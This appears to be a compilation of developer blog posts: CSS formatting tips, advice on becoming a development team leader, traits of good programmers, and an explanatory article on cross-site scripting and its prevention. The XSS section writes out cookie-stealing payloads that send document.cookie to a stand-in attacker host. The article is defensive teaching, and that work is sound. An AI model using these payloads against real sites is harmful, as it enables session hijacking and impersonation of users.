Headers:        2.7em/1.3em Helvetica, Arial, "Lucida Sans Unicode", Verdana, sans-serif;
Input, textarea:    1.1em Helvetica, Verdana, Geneva, Arial, sans-serif;
Sidebar heading:    1.5em Helvetica, Trebuchet MS, Arial, sans-serif;

Notes:    decreasing heading by 0.4em with every subsequent heading level
——————————————————————-*/

4. Order CSS properties

When writing the code often it’s useful to apply some special formatting to order CSS properties — to make the code more readable, more structured and therefore more intuitive. There is a variety of grouping schemes developers use in their projects. Some developers tend to put colors and fonts first; other developers prefer to put “more important” assignments such as those related to positioning and floats first. Similarly, elements are also often sorted according to the topology of the site and the structure of the layout. This approach can be applied to CSS selectors as well:

    body,
    h1, h2, h3,
    p, ul, li,
    form {
        border: 0;
        margin: 0;
        padding: 0;
    }

Some developers use a more interesting approach — they group properties in an alphabetical order. Here it’s important to mention that alphabetizing CSS properties may lead to some problems in some browsers. You may need to make sure that no changes are produced as a result of your ordering manipulations.

body {
    background: #fdfdfd;
    color: #333;
    font-size: 1em;
    line-height: 1.4;
    margin: 0;
    padding: 0;
}

Whatever grouping format you are using, make sure you clearly define the format and the objective you want to achieve. Your colleagues will thank you for your efforts. And you’ll thank them for sticking to your format.

5. Indentation is your friend!

For better overview of your code you might consider using one-liners for brief fragments of code. This style might produce messy results if you define more than 3 attributes for a given selector. However, used moderately, you can highlight dependencies between all elements of the same class. This technique will dramatically increase code readability when you have to find some specific element in your stylesheet.

#main-column { display: inline; float: left; width: 30em; }
        #main-column h1 { font-family: Georgia, "Times New Roman", Times, serif; margin-bottom: 20px; }
        #main-column p { color: #333; }

You remember exactly what you did and can jump back in there and fix it. But what if you made a lot of changes that day, or you just simply can’t remember? Chris Coyier suggests an interesting solution for highlighting recent changes in your CSS-code. Simply indenting new or changed lines in your CSS you can make recent changes in your code more visible. You can as well use some comments keywords (e.g. @new) — you’ll be able to jump to the occurrences of the keyword and undo changes once you’ve found some problems.

#sidebar ul li a {
     display: block;
     background-color: #ccc;
          border-bottom: 1px solid #999; /* @new */
     margin: 3px 0 3px 0;
          padding: 3px; /* @new */
}

Conclusion

CSS styleguides are helpful if and only if they are used properly. Keep in mind that you should remove every styleguide which doesn’t effectively help you to get a better understanding of the code or achieve a well-structured code. Avoid too many styleguides for too many elements bundled in too many groups. Your goal is to achieve a readable and maintainable code. Stick to it and you’ll save yourself a lot of trouble.

Being a Development Team Leader?

I’d like to become a Development Team Leader

Hopefully most will have actually considered the change of role and be looking for new challenges and ways to contribute more to their chosen profession. However, for some this is an automatic response to a question that is particularly difficult to answer in an industry with no clear career path. For others it’s simply a way to move up the pay scale.

Before you start talking to your manager or applying for your next job it’s worth considering what you’re getting yourself into. Depending on where you work there will be different definitions of a Development Team Leader (DTL). To put this post in perspective this is my interpretation,

A Development Team Leader is someone who owns the technical delivery of a solution. They need to understand the business drivers behind the project and be able to lead a team of Developers to realise these drivers in working software.They are (IMHO) the central player in a project team and need to maintain excellent communication with all members of the team from Client to Developers and everyone in between.

I tend to distinguish between what I call a Senior Developer (SD) and a DTL. A SD is someone who still does the tasks of a developer but does them really well and has lots of experience. They don’t tend to have the added responsibilities of a DTL. DTL’s often (but not necessarily) have a SD background.

Assuming you’re a developer this is what I reckon your job entails.

Let’s face it the life of your average developer is focused around cutting code. Sure you might have daily Scrums or other team meetings to attend but your main focus is writing software. And you love it!

When you become a DTL you work balance is up for a bit of a change.

Other than the coding slice don’t place to much attention on the relative weights of the pie slices – suffice to say you won’t be zoning out for 8 hours a day to your favourite tunes – you’re the one that gets interrupted, you’re the one putting out the fires and making sure the wheels are oiled. Your head is on the line if the solution doesn’t meet expectations or is delivered late. You have some responsibilities and influence now.

Coding – don’t worry, you still get to practice your craft but just not as much as you used to. There are now lots of other things that you need to be involved in too.
Documentation – even with the increasing popularity of Agile methodologies and a move away from excessive documentation there are still times when (technical) documentation is necessary – and guess what? You will be first in line to do it.
Meetings – if you thought you were in lots of meetings as a developer then you ain’t seen nothing yet. Depending on the size of the project you are involved in you will be the main participant in a wide variety of meetings. Whether it’s a meeting with the client, the delivery team, the PM, you are the one with the most knowledge of both the requirements and the implementation of the solution.
Communications – beyond official meetings you will also be heavily involved with communicating to others via emails, issue tracking software, the phone and face to face catch ups on progress. It’s a bit of a cliche but good communication skills really are the key to succeeding in many professions – and for any leadership role it’s essential.
Delegation – because of your other duties it’s an essential part of your role to be able to delegate work to others. Someone once told me that the job of the DTL is to make themselves redundant – an apparent contradiction to your pivotal role on the project but one that sums up the responsibility you have to ensure the project moves forward even when you can’t personally be there to solve an issue. The more you delegate responsibility to others in your team the more involved and productive they become. Don’t try and do everything yourself.
Mentoring – part of reason for delegating tasks to others is to provide them with opportunities for personal growth and development. Mentoring carries this idea further and is a key part of your role. No-one is an island and you must be prepared to share your knowledge with others. As an aside you should also be prepared to learn from your team – DTL’s who think they know it all are usually wrong and always disruptive to the morale and effectiveness of the team.

How to Become a Development Team Leader?

As Development Manager to a team of incredibly motivated and talented individuals I often have conversations that begin,

    Hey Tokes, I really want to move my career to the next step and want to know what I can do to become a Development Team Leader.

My response,

    Act like one!

That’s right, it’s that simple. Wherever possible take it upon yourself to assume some of the tasks that would normally be expected of a DTL. The more DTL skills you display the more likely others will see you in that light and give you the opportunity to perform the role for real. Whatever you do, don’t sit quietly behind your desk with the headphones on and expect someone to recognise your leadership potential and tap you on the shoulder – it won’t happen. Similarly don’t assume that because you’re a technical genius that becoming a DTL is the natural next step in your career or something you deserve in recognition of your talents. The skills of a DTL go beyond the technical and require you to have other skills like great communication, the ability to delegate, confidence, being level headed, acting in a professionalism manner…

So what can you do I hear you ask? You’re only a developer, right? Wrong, the act of developing is only part of what you have to offer.

Let it Be Known – it seems obvious but you should let your manager/PM/peers or anyone else who will listen that you want to become a DTL. Don’t be a nag about it but just plant the seed in people’s minds.

Understand the Big Picture – one of the big differences between a good developer and a great one is their ability (or interest) to understand the big picture. They understand the business goals and pain points the system is addressing. They understand the entire solution, not just their part of it. They understand how the code they are writing benefits the client and the solution as a whole. They understand the client and what is important to them. They understand that the code is a means to an end and that project success will be primarily measured by client satisfaction.

Ask Questions – I love working with people who ask questions. It shows you are attempting to understand things thoroughly. It shows you’re not afraid to question why something is being done in a certain way. It show’s, that as a DTL, I’m not the only one thinking things through and that there’s more chance the team is on the right track. Understanding the Big Picture is crucial to being able to ask the right questions.

Don’t Wait to Be Asked – while you should always be on top of the tasks delegated to you, don’t stop there. Be hungry like a wolf, hunting out ways in which you can add value, help others and identify issues. Do not wait for your own DTL to ask you to do something, try and always be one step ahead without, of course, second guessing their authority.

Be Approachable – DTL’s are often the go-to guys (or gals) but they’re also pulled away from the team to attend meetings etc. Be approachable (i.e. take off the headphones now and then!) and aim to be the one people seek out when the DTL’s away – this is a great sign that you have the respect of the team. If you’re doing the things above this will be a natural consequence and shouldn’t require you to do anything specific.

Stay Calm – what was it that Mr Kipling said? "If you can keep your head when all about you Are losing theirs… you’ll be a DTL my son!". Software development can be a stressful business. Look around at DTL’s you respect – guaranteed they will be the level headed ones, the ones that don’t let the pressure get the better of them (or at least are good at hiding it!)

What makes one developer better than another?

Shouldn’t we all be performing at the same level? Of course not, we’re not sewing buttons on an assembly line. We’re using every bit of our intelligence to create something that we can only begin to understand.

    * I think logically. Computers don’t care how you feel, and your opinion doesn’t matter. All that matters is if you write your code exactly the way the computer dictates.
    * I constantly look for better ways of doing things. I subscribe to a good number of development blogs. I alone cannot always come up with the best way to solve a problem, but somebody somewhere probably can.
    * I read books. Joel says that most programmers have stopped reading books. What a shame. Blogs are great for snippets, but it’s rare that they cover a topic well from start to finish. Blogs are the ADD version of books.
    * I don’t stop thinking about problems and how to solve them through automation. Sometimes I’ll wake up in the middle of the night, and I can’t get back to sleep until I write some code that I can’t get out of my head.
    * I have side projects that I think are interesting, and give me a chance to try things that I might not want to try on my production code at work. Yes, my side projects distract me at work, but the knowledge I gain pays back the time I lost.
    * I have a tech blog. I suggest all developers start a blog and give back to the community. If you solve a problem, we want to hear about it! At the very least, it will give you an opportunity to formalize your ideas, which will either reinforce them, or make you realize you were wrong. You might also get some great feedback.
    * I try to prove myself wrong (aka objective). Everyone wants to be right. I try to prove myself wrong when appropriate. One of the hardest things in the world for a developer to do is say that the code they just spent a week writing is useless. Maybe it is, don’t fight it, work with it.
    * I keep up with the latest technologies, and force myself to try them.
    * I have a relatively good understanding of how the computer hardware and software works. I’ve met too many developers that barely know how to turn on a computer.
    * I’m great at writing Google queries.
    * I’m not just in it for the money. I actually enjoy what I do. I had a job interview where the guy that would have been my boss told me a story about how he was brought in off the street and thrown into managing their software projects. When the software industry starts getting rough, who do you think is the first person to go?
    * I’m sympathetic to the users pain. If I can share their pain, I’ll want to fix it and prevent it.
    * I realize my code will never be perfect, so I try to make it testable and modular. I set up processes that try to minimize the effect of my human error.
    * I don’t think Microsoft is evil, and I don’t think they’re a saint. They’re a big company. Some of the stuff they write is crap, some is amazing. The same is true for any other company out there.
    * I learn from my mistakes. I try to put at least 2 checks in place to avoid any past mistakes. If one check fails, I’ll have the other.
    * When I’m asked to solve a problem, I think above the problem, and determine if it’s a problem that even needs solved.

Cross-site scripting attacks : How to Prevent?

Cross-site scripting (XSS for short) is one of the most common application-level attacks that hackers use to sneak into Web applications. XSS is an attack on the privacy of clients of a particular Web site, which can lead to a total breach of security when customer details are stolen or manipulated. Most attacks involve two parties: either the attacker and the Web site or the attacker and the client victim. Unlike those, the XSS attack involves three parties: the attacker, the client, and the Web site.

The goal of the XSS attack is to steal the client cookies or any other sensitive information that can identify the client with the Web site. With the token of the legitimate user in hand, the attacker can proceed to act as the user in interaction with the site, thus to impersonate the user. For example, in one audit conducted for a large company, it was possible to peek at the user’s credit card number and private information by using an XSS attack. This was achieved by running malicious JavaScript code on the victim (client) browser, with the access privileges of the Web site. These are the very limited JavaScript privileges that generally do not let the script access anything but site-related information. It is important to stress that, although the vulnerability exists at the Web site, at no time is the Web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. As a result, the attacker gets the cookies and impersonates the victim.

Explanation of the XSS technique

Let’s call the site under attack: www.vulnerable.site. At the core of a traditional XSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or path) and echoes it back to the response page, in full or in part, without first sanitizing it (thus not making sure that it doesn’t contain JavaScript code nor HTML tags. Suppose, therefore, that this script is named welcome.cgi, and its parameter is name. It can be operated this way:

  GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
  Host: www.vulnerable.site
   
The response would be:

  <HTML>
  <Title>Welcome!</Title>
  Hi Joe Hacker <BR>
  Welcome to our system
  …
  </HTML>

How can this be abused? Well, the attacker manages to lure the victim client into clicking a link that the attacker supplies to the user. This is a carefully and maliciously crafted link that causes the Web browser of the victim to access the site (www.vulnerable.site) and invoke the vulnerable script. The data to the script consists of JavaScript that accesses the cookies that the client browser has stored for www.vulnerable.site. This is allowed because the client browser "experiences" the JavaScript coming from www.vulnerable.site, and JavaScript security model allows scripts arriving from a particular site to access cookies that belong to that site.

Such a link looks like this one:

http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
 
The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows:

  GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
  Host: www.vulnerable.site …

The vulnerable site response would be:

  <HTML> <Title>Welcome!</Title> Hi <script>alert(document.cookie)</script>
  <BR> Welcome to our system …
  </HTML>
 
The victim client’s browser would interpret this response as an HTML page containing a piece of JavaScript code. This code, when executed, is allowed to access all cookies belonging to www.vulnerable.site. Therefore, it will pop up a window at the client browser showing all client cookies belonging to www.vulnerable.site.

Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may erect a Web site (www.attacker.site) and use a script to receive the cookies. Instead of popping up a window, the attacker would write code that accesses a URL at www.attacker.site, thereby invoking the cookie-reception script, with a parameter being the stolen cookies. This way, the attacker can get the cookies from the www.attacker.site server.

The malicious link would be:

http://www.vulnerable.site/welcome.cgi?name=<script>window.open
("http://www.attacker.site/collect
  .cgi?cookie="%2Bdocument.cookie)</script>
     
And the response page would look like:

  <HTML> <Title>Welcome!</Title> Hi
  <script>window.open("http://www.attacker.site/collect.cgi?cookie=
"+document.cookie)</script>
  <BR>
  Welcome to our system … </HTML>
   
The browser, immediately upon loading this page, would execute the embedded JavaScript and send a request to the collect.cgi script in www.attacker.site, with the value of the cookies of www.vulnerable.site that the browser already has. This compromises the cookies of www.vulnerable.site that the client has. It allows the attacker to impersonate the victim. The privacy of the client is completely breached.

Note:
Causing the JavaScript pop-up window to emerge usually suffices to demonstrate that a site is vulnerable to an XSS attack. If the JavaScript Alert function can be called, there is usually no reason for the window.open call not to succeed. That is why most examples for XSS attacks use the Alert function, which makes it very easy to detect its success.

Scope and feasibility

The attack can take place only at the victim’s browser, the same one used to access the site (www.vulnerable.site). The attacker needs to force the client to access the malicious link. This can happen in these ways:

    * The attacker sends an e-mail message containing an HTML page that forces the browser to access the link. This requires the victim to use the HTML-enabled e-mail client, and the HTML viewer at the client is the same browser that is used for accessing www.vulnerable.site.

    * The client visits a site, perhaps operated by the attacker, where a link to an image or otherwise-active HTML forces the browser to access the link. Again, it is mandatory that the same browser be used for accessing both this site and www.vulnerable.site.

The malicious JavaScript can access any of this information:

    * Permanent cookies (of www.vulnerable.site) maintained by the browser
    * RAM cookies (of www.vulnerable.site) maintained by this instance of the browser, only when it is currently browsing www.vulnerable.site
    * Names of other windows opened for www.vulnerable.site
    * Any information that is accessible through the current DOM (from values, HTML code, and so forth)

Identification, authentication, and authorization tokens are usually maintained as cookies. If these cookies are permanent, the victim is vulnerable to the attack even when not using the browser at the moment to access www.vulnerable.site. If, however, the cookies are temporary, such as RAM cookies, then the client must be in session with www.vulnerable.site.

Anther possible implementation for an identification token is a URL parameter. In such cases, it is possible to access other windows by using JavaScript in this way (assuming that the name of the page with the necessary URL parameters is foobar):

<script>var victim_window=open(",’foobar’);alert(‘Can access:
‘ +victim_window.location.search)</script>
 
Variations on this theme

It is possible to use many HTML tags, beside <SCRIPT> to run the JavaScript. In fact, it is also possible for the malicious JavaScript code to reside on another server and to force the client to download the script and execute it, which can be useful if a lot of code is to be run or when the code contains special characters.

A couple of variations on these possibilities:

    * Rather than <script>…</script>, hackers can use <img src="javascript:…">. This is good for sites that filter the <script> HTML tag.

    * Rather than <script>…</script>, it is possible to use <script src="http://…">. This is good for a situation where the JavaScript code is too long or when it contains forbidden characters.

Sometimes, the data embedded in the response page is found in non-free HTML context. In this case, it is first necessary to "escape" to the free context, and then to append the XSS attack. For example, if the data is injected as a default value of an HTML form field:


<input type=text name=user value="…">

Then it is necessary to include "> in the beginning of the data to ensure escaping to the free HTML context. The data would be:

"><script>window.open("http://www.attacker.site/collect.cgi?cookie=
"+document.cookie)</script>

And the resulting HTML would be:


<input type=text name=user value=""><script>window.open
("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script>">

Other ways to perform traditional XSS attacks

So far, we have seen that an XSS attack can take place in a parameter of a GET request that is echoed back to the response by a script. But it is also possible to carry out the attack with a POST request or by using the path component of the HTTP request — and even by using some HTTP headers (such as the Referer).

In particular, the path component is useful when an error page returns the erroneous path. In this case, including the malicious script in the path will often execute it. Many Web servers are found vulnerable to this attack.

What went wrong?

It is important to understand that, although the Web site is not directly affected by this attack (it continues to function normally, malicious code is not executed on the site, no DoS condition occurs, and data is not directly manipulated nor read from the site), it is still a flaw in the privacy that the site offers its visitors, or clients. This is just like a site deploying an application with weak security tokens, whereby an attacker can guess the security token of a client and impersonate him or her.

The weak spot in the application is the script that echoes back its parameter, regardless of its value. A good script makes sure that the parameter is of a proper format, contains reasonable characters, and so on. There is usually no good reason for a valid parameter to include HTML tags or JavaScript code, and these should be removed from the parameter before it is embedded in the response or before processing it in the application, to be on the safe side.

How to secure a site against XSS attacks

It is possible to secure a site against an XSS attack in three ways:

   1. By performing in-house input filtering (sometimes called input sanitation). For each user input — be it a parameter or an HTTP header — in each script written in-house, advanced filtering against HTML tags, including JavaScript code, should be applied. For example, the welcome.cgi script from the previous case study should filter the <script> tag after it is through decoding the name parameter. This method has some severe downsides, though:
          * It requires the application programmer to be well-versed in security.
          * It requires the programmer to cover all possible input sources (query parameters, body parameters of POST requests, HTTP headers).
          * It cannot defend against vulnerabilities in third-party scripts or servers. For example, it won’t defend against problems in error pages in Web servers (which display the path of the resource).

   2. By performing "output filtering," that is, filtering the user data when it is sent back to the browser, rather than when it is received by a script. A good example for this would be a script that inserts the input data to a database and then presents it. In this case, it is important not to apply the filter to the original input string, but only to the output version. The drawbacks are similar to the ones for input filtering.

   3. By installing a third-party application firewall, which intercepts XSS attacks before they reach the Web server and the vulnerable scripts, and blocks them. Application firewalls can cover all input methods in a generic way (including path and HTTP headers), regardless of the script or path from the in-house application, a third-party script, or a script describing no resource at all (for example, one designed to provoke a 404 page response from the server). For each input source, the application firewall inspects the data against various HTML tag patterns and JavaScript patterns. If any match, the request is rejected, and the malicious input does not arrive at the server.

Ways to check whether your site is protected from XSS

Checking that a site is secure from XSS attacks is the logical conclusion of securing the site. Just like securing a site against XSS, checking that the site is indeed secure can be done manually (the hard way) or by using an automated Web application vulnerability-assessment tool, which offloads the burden of checking. The tool crawls the site and then launches all the variants that it knows against all of the scripts that it found by trying the parameters, the headers, and the paths. In both methods, each input to the application (parameters of all scripts, HTTP headers, path) is checked with as many variations as possible, and if the response page contains the JavaScript code in a context where the browser can execute it, then an XSS vulnerability is exposed. For example, sending this text:

<script>alert(document.cookie)</script>

to each parameter of each script (through a JavaScript-enabled browser to reveal an XSS vulnerability of the simplest kind) the browser will pop up the JavaScript Alert window if the text is interpreted as JavaScript code. Of course, there are several variants; therefore, testing only that variant is insufficient. And, as you already learned, it is possible to inject JavaScript into various fields of the request: the parameters, the HTTP headers, and the path. However, in some cases (notably the HTTP Referer header), it is awkward to carry out the attack by using a browser.

Summary

Cross-site scripting is one of the most common application-level attacks that hackers use to sneak into Web applications, as well as one of the most dangerous. It is an attack on the privacy of clients of a particular Web site, which can lead to a total breach of security when customer details are stolen or manipulated. Unfortunately, as this article explains, this is often done without the knowledge of either the client or the organization being attacked.

To prevent Web sites being vulnerable to these malicious acts, it is critical that an organization implement both an online and offline security strategy. This includes using an automated vulnerability-assessment tool that can test for all of the common Web vulnerabilities and application-specific vulnerabilities (such as cross-site scripting) on a site. For a full online defense, it is also vital to install a firewall application that can detect and defend against any type of manipulation to the code and content sitting on and behind the Web servers.